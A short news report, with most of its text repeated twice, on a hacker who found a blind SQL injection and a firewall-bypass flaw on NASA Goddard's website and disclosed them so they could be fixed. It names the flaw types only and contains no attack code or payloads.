German hacker D35m0nd142 has identified a couple of vulnerabilities on the website of NASA’s Goddard Space Flight Center (GSFC) that could have been leveraged by cybercriminals to cause some serious damage. Fortunately, the agency rushed to address the issues after being notified by the hacker.
D35m0nd142 has discovered a Blind SQL Injection vulnerability and a web application firewall (WAF) bypass flaw.
As demonstrated by the hacker, the SQL Injection bug could have been successfully exploited by a remote attacker to gain access to the site’s databases, including the ones containing user details.
The WAF bypass flaw could have been leveraged to bypass the firewalls set up to protect the website.
“I haven't done and I will not do any type of damage. This attack hasn't any malicious purpose. I've just listed some tables and most important columns of this database in order to demonstrate the big and dangerous vulnerability, not for fun,” the hacker said.
“As anyone can see, there are a lot of interesting and sensible informations that could have been taken and exploited by malicious attackers and, for this reason, this bug needs to be repaired as soon as possible.”
To demonstrate the risks posed by the flaws he identified, the expert published a number of screenshots, along with the names of databases and tables that could have been accessed by an attacker exploiting them.
The large number of security breaches that has occurred over the past period has made NASA take some measures to protect the personal details of its employees
Source
D35m0nd142 has discovered a Blind SQL Injection vulnerability and a web application firewall (WAF) bypass flaw.
As demonstrated by the hacker, the SQL Injection bug could have been successfully exploited by a remote attacker to gain access to the site’s databases, including the ones containing user details.
The WAF bypass flaw could have been leveraged to bypass the firewalls set up to protect the website.
“I haven't done and I will not do any type of damage. This attack hasn't any malicious purpose. I've just listed some tables and most important columns of this database in order to demonstrate the big and dangerous vulnerability, not for fun,” the hacker said.
“As anyone can see, there are a lot of interesting and sensible informations that could have been taken and exploited by malicious attackers and, for this reason, this bug needs to be repaired as soon as possible.”
To demonstrate the risks posed by the flaws he identified, the expert published a number of screenshots, along with the names of databases and tables that could have been accessed by an attacker exploiting them.
The large number of security breaches that has occurred over the past period has made NASA take some measures to protect the personal details of its employees
Source
